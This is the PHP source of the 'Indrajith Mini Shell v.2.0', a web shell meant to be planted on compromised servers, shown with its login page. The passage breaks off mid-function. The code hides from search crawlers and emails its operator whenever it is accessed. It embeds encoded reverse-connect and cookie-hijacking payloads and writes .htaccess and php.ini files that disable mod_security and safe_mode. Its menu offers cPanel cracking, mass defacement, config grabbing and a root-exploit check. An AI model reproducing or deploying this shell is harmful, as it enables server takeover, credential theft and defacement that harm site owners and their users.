.textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
.textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
.input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
#result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
.table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
.table a{ text-decoration:none; color:green; font-size:15px; }
.table a:hover{text-decoration:underline;}
.table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
.table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
.table tr:hover{ background:#181818; }
.tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; }
.tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
.tbl a:hover{text-decoration:underline;}
.tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; }
.tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
.tbl td:hover{ background:#181818; }
#alert {position: relative;}
#alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
#alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
#alert:target {display: none;}
.alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
.alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
@keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
</style><title>INDRAJITH SHELL v.2.0</title></head><body><center>
<div id="loginbox"><p><font face="verdana,arial" size="-1">
<font color="orange">>>>>>>>>>></font><font color="white">>>>>><<<<<</font><font color="green">>>>>>>>>>></font>
</font></p><center><table cellpadding="2" cellspacing="0" border="0" id="ap_table">
<tbody><tr><td bgcolor="green"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td bgcolor="green" align="center" style="padding:2;padding-bottom:4"><b><font color="white" size="-1" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></b></td></tr>
<tr><td bgcolor="black" style="padding:5">
<form method="post">
<input type="hidden" name="action" value="login">
<input type="hidden" name="hide" value="">
<center><table>
<tbody><tr><td><font color="green" face="verdana,arial" size="-1">Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == 'username'){this.value = '';}"></td></tr>
<tr><td><font color="green" face="verdana,arial" size="-1">Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == 'password') this.value = '';"></td></tr>
<tr><td><font face="verdana,arial" size="-1"> </font></td><td><font face="verdana,arial" size="-1"><input type="submit" value="Enter"></font></td></tr></tbody></table>
<br></center></form></td></tr></tbody></table></td></tr></tbody></table></center></div></center></body></html>Original PHP code
<?php
/*
* Indrajith Mini Shell v.2.0 with additional features....
* originally scripted by AJITH KP
* (c) Under Gnu General Public Licence 3(c)
* Team Open Fire and Indishell Family
* TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
* Indishell : ASHELL, D@rkwolf.
* THA : THA RUDE [There is Nothing in Borders]
* Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
*/
/*------------------ LOGIN -------------------*/
$username="ajithkp560";
$password="ajithkp560";
$email="ajithkp560@gmail.com";
/*------------------ Login Data End ----------*/
@error_reporting(4);
/*------------------ Anti Crawler ------------*/
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
{
header('HTTP/1.0 404 Not Found');
exit;
}
}
echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/
echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
echo "<style>
html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
#loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
loginbox td { border-radius:5px; font-size:11px; }
.header { size:25px; color:green; }
h1 { font-family:DigifaceWide; color:green; font-size:200%; }
h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
.go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
.input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
hr { border:1px solid #222222; }
#meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
#meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
#meunlist li { margin: 0px; padding: 0px; display: inline; }
#meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
#meunlist a:hover { background: #333; color:green; }
.menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; }
.menu { font-size:25px; color: }
.textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
.textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
.input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
#result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
.table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
.table a{ text-decoration:none; color:green; font-size:15px; }
.table a:hover{text-decoration:underline;}
.table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
.table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
.table tr:hover{ background:#181818; }
.tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; }
.tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
.tbl a:hover{text-decoration:underline;}
.tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; }
.tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
.tbl td:hover{ background:#181818; }
#alert {position: relative;}
#alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
#alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
#alert:target {display: none;}
.alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
.alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
@keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
</style>";
if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password))
{
if($_POST["usrname"]==$username && $_POST["passwrd"]==$password)
{
print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
if($email!="")
{
mail_alert();
}
}
else
{
if($_POST['usrname'])
{
print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
}
echo '<title>INDRAJITH SHELL v.2.0</title><center>
<div id=loginbox><p><font face="verdana,arial" size=-1>
<font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>
<tr><td bgcolor="black" style="padding:5">
<form method="post">
<input type="hidden" name="action" value="login">
<input type="hidden" name="hide" value="">
<center><table>
<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
</div><br /></center>';
exit;
}
}
$color_g="green";
$color_b="4C83AF";
$color_bg="#111111";
$color_hr="#222";
$color_wri="green";
$color_rea="yellow";
$color_non="red";
$path=$_GET['path'];
@session_start();
@set_time_limit(0);
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ignore_user_abort(FALSE);
@ini_set('zlib.output_compression','Off');
$sep="/";
if(strtolower(substr(PHP_OS,0,3))=="win")
{
$os="win";
$sep="\\";
$ox="Windows";
}
else
{
$os="nix";
$ox="Linux";
}
$self=$_SERVER['PHP_SELF'];
$srvr_sof=$_SERVER['SERVER_SOFTWARE'];
$your_ip=$_SERVER['REMOTE_ADDR'];
$srvr_ip=$_SERVER['SERVER_ADDR'];
$admin=$_SERVER['SERVER_ADMIN'];
$s_php_ini="safe_mode=OFF
disable_functions=NONE";
$ini_php="<?
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"file\"]);
ini_restore(\"safe_mode\");
ini_restore(\"open_basedir\");
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"ss\"]);
?>";
$s_htaccess="<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>";
$s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl";
$sym_htaccess="Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
$sym_php_ini="safe_mode=OFF
disable_functions=NONE";
$forbid_dir="Options -Indexes";
$cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
$bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
/*----------------------- Top Menu ------------------------------------------*/
if($safemode=="On")
{
echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
}
else
{
echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
}
echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>
<table>
<tbody>
<tr>
<td style='border-right:1px solid #104E8B;' width=\"300px;\">
<div style='text-align:center;'>
<a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
</div>
</td>
<td>
<div class=\"header\">OS</font> <font color=\"#666\" >:</font>
".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
<br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
if($os == 'win'){ echo "Drives <font color=\"#666\" > : </font>";echo drivesx(); }
else { echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>"; echo r00t_exploit() ."</font>"; }
echo "
</div>
</td>
</tr>
</tbody>
</table></div>";
echo "<div class='menubar'> <div id=\"meunlist\">
<ul>
<li><a href=\"?\">HOME</a></li>
<li><a href=\"?symlink\">SymLink</a></li>
<li><a href=\"?rs\">((( Connect )))</a></li>
<li><a href=\"?cookiejack\">Cookie HighJack</a></li>
<li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
<li><a href=\"?path={$path}&safe_mod\">Safe Mode Fucker</a></li>
<li><a href=\"?path={$path}&forbd_dir\">Directory Listing Forbidden</a></li>
</ul>
<ul>
<li><a href=\"?massmailer\">Mass Mailer</a></li>
<li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
<li><a href=\"?server_exploit_details\">Exploit Details</a></li>
<li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>
<li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
<li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
</ul>
<ul>
<li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>
<li><a href=\"?sshman\">SSH Shell</a></li>
<li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>
<li><a href=\"?ftpman\">FTP Manager</a></li>
<li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>
<li><a href=\"?path={$path}&mass_xploit\">Mass Deface</a></li>
<li><a href=\"?config_grab\">Config Grabber</a></li>
<li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
</ul>
</div></div>";
/*----------------------- End of Top Menu -----------------------------------*/
/*--------------- FUNCTIONS ----------------*/
function alert($alert_txt)
{
echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
}
function disabled_functns()
{
if(!@ini_get('disable_functions'))
{
echo "None";
}
else
{
echo @ini_get('disable_functions');
}
}
function drivesx()
{
foreach(range('A','Z') as $drive)
{
if(is_dir($drive.':\\'))
{
echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
}
}
}
function mail_alert()
{
global $email, $your_ip;
$shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$content_mail="Hello Master,\n
Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n
By Indrajith";
mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com");
}
function filesizex($size)
{
if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
elseif ($size>=1024)$size = round(($size/1024),2)." KB";
else $size .= " B";
return $size;
}
function disc_size()
{
echo filesizex(disk_total_space("/"));
}
function freesize()
{
echo filesizex(disk_free_space("/"));
}
function file_perm($filz){
if($m=fileperms($filz)){
$p='';
$p .= ($m & 00400) ? 'r' : '-';
$p .= ($m & 00200) ? 'w' : '-';
$p .= ($m & 00100) ? 'x' : '-';
$p .= ($m & 00040) ? 'r' : '-';
$p .= ($m & 00020) ? 'w' : '-';
$p .= ($m & 00010) ? 'x' : '-';
$p .= ($m & 00004) ? 'r' : '-';
$p .= ($m & 00002) ? 'w' : '-';
$p .= ($m & 00001) ? 'x' : '-';
return $p;
}
else return "?????";
}
function mysqlx()
{
if(function_exists('mysql_connect'))
{
echo "<font color='red'>Enabled</font>";
}
else
{
echo "<font color='green'>Disabled</font>";
}
}
function oraclesx()
{
if(function_exists('oci_connect'))
{
echo "<font color='red'>Enabled</font>";
}
else
{
echo "<font color='green'>Disabled</font>";
}
}
function mssqlx()
{
if(function_exists('mssql_connect'))
{
echo "<font color='red'>Enabled</font>";
}
else
{
echo "<font color='green'>Disabled</font>";
}
}
function postgreyx()
{
if(function_exists('pg_connect'))
{
echo "<font color='red'>Enabled</font>";
}
else
{
echo "<font color='green'>Disabled</font>";
}
}
function strip($filx)
{
if(!get_magic_quotes_gpc()) return trim(urldecode($filx));
return trim(urldecode(stripslashes($filx)));
}
function curlx()
{
if(function_exists('curl_version'))
{
echo "<font color='red'>Enabled</font>";
}
else
{
echo "<font color='green'>Disabled</font>";
}
}
function filesize_x($filex)
{
$f_size=filesizex(filesize($filex));
return $f_size;
}
function rename_ui()
{
$rf_path=$_GET['rename'];
echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value=' >>> ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
}
function filemanager_bg()
{
global $sep, $self;
$path=!empty($_GET['path'])?$_GET['path']:getcwd();
$dirs=array();
$fils=array();
if(is_dir($path))
{
chdir($path);
if($handle=opendir($path))
{
while(($item=readdir($handle))!==FALSE)
{
if($item=="."){continue;}
if($item==".."){continue;}
if(is_dir($item))
{
array_push($dirs, $path.$sep.$item);
}
else
{
array_push($fils, $path.$sep.$item);
}
}
}
else
{
alert("Access Denied for this operation");
}
}
else
{
alert("Directory Not Found!!!");
}
echo "<div id=result><table class=table>
<tr>
<th width='500px'>Name</th>
<th width='100px'>Size</th>
<th width='100px'>Permissions</th>
<th width='500px'>Actions</th>
</tr>";
foreach($dirs as $dir)
{
echo "<tr><td><a href='{$self}?path={$dir}'>".basename($dir)."</a></td>
<td>".filesize_x($dir)."</td>
<td><a href='{$self}?path={$path}&perm={$dir}'>".file_perm($dir)."</a></td>
<td><a href='{$self}?path={$path}&del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&rename={$dir}'>Rename</a></td></tr>";
}
foreach($fils as $fil)
{
echo "<tr><td><a href='{$self}?path={$path}&read={$fil}'>".basename($fil)."</a></td>
<td>".filesize_x($fil)."</td>
<td><a href='{$self}?path={$path}&perm={$fil}'>".file_perm($fil)."</a></td>
<td><a href='{$self}?path={$path}&del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&copy={$fil}'>Copy</a> </td>";
}
echo "</tr></table></div>";
}
function rename_bg()
{
if(isset($_GET['old_name']) && isset($_GET['new_name']))
{
$o_r_path=basename($_GET['old_name']);
$r_path=str_replace($o_r_path, "", $_GET['old_name']);
$r_new_name=$r_path.$_GET['new_name'];
echo $r_new_name;
if(rename($_GET['old_name'], $r_new_name)==FALSE)
{
alert("Access Denied for this action!!!");
}
else
{
alert("Renamed File Succeessfully");
}
}
}
function edit_file()
{
$path=$_GET['path'];
chdir($path);
$edt_file=$_GET['edit'];
$e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
if($e_content)
{
$o_content=$e_content;
}
else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
{
$fd = fopen($edt_file, "rb");
if(!$fd)
{
alert("Permission Denied");
}
else
{
while(!feof($fd))
{
$o_content=wordwrap(htmlspecialchars(fgets($fd)));
}
}
fclose($fd);
}
echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>". basename($_GET['edit']) ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
<center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
<input class='input_big' name='save' type='submit' value=' Save ' /><br /><br /><hr /><br /><br /></div>";
}
function edit_file_bg()
{
if(file_exists($_POST['e_file']))
{
$handle = fopen($_POST['e_file'],"w+");
if (!handle)
{
alert("Permission Denied");
}
else
{
fwrite($handle,$_POST['e_content_n']);
alert("Your changes were Successfully Saved!");
}
fclose($handle);
}
else
{
alert("File Not Found!!!");
}
}
function delete_file()
{
$del_file=$_GET['del_fil'];
if(unlink($del_file) != FALSE)
{
alert("Deleted Successfully");
exit;
}
else
{
alert("Access Denied for this Operation");
exit;
}
}
function deldirs($d_dir)
{
$d_files= glob($d_dir.'*', GLOB_MARK);
foreach($d_files as $d_file)
{
if(is_dir($d_file))
{
deldirs($d_file);
}
else
{
unlink($d_file);
}
}
if(is_dir($d_dir))
{
if(rmdir($d_dir))
{
alert("Deleted Directory Successfully");
}
else
{
alert("Access Denied for this Operation");
}
}
}
function code_viewer()
{
$path=$_GET['path'];
$r_file=$_GET['read'];
$r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
if($r_content)
{
$rr_content=$r_content;
}
else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
{
$fd = fopen($r_file, "rb");
if (!$fd)
{
alert("Permission Denied");
}
else
{
while(!feof($fd))
{
$rr_content=wordwrap(htmlspecialchars(fgets($fd)));
}
}
fclose($fd);
}
echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&edit=".$_GET['read']."'>". basename($_GET['read']) ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre><br /><br /><hr /><br /><br /></div>";
}
function copy_file_ui()
{
echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value=' >> ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
}
function copy_file_bg()
{
global $sep;
if(function_exists(copy))
{
if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
{
alert("Succeded");
}
else
{
alert("Access Denied");
}
}
}
function ch_perm_bg()
{
if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
{
if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
{
alert("Succeded. Permission Changed!!!");
}
else
{
alert("Access Denied for This Operation");
}
}
}
function ch_perm_ui()
{
$p_file=$_GET['perm'];
echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value=' >> ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
ch_perm_bg();
}
function mk_file_ui()
{
chdir($_GET['path']);
echo "<div id=result><br /><br /><font color=red><form method='GET'>
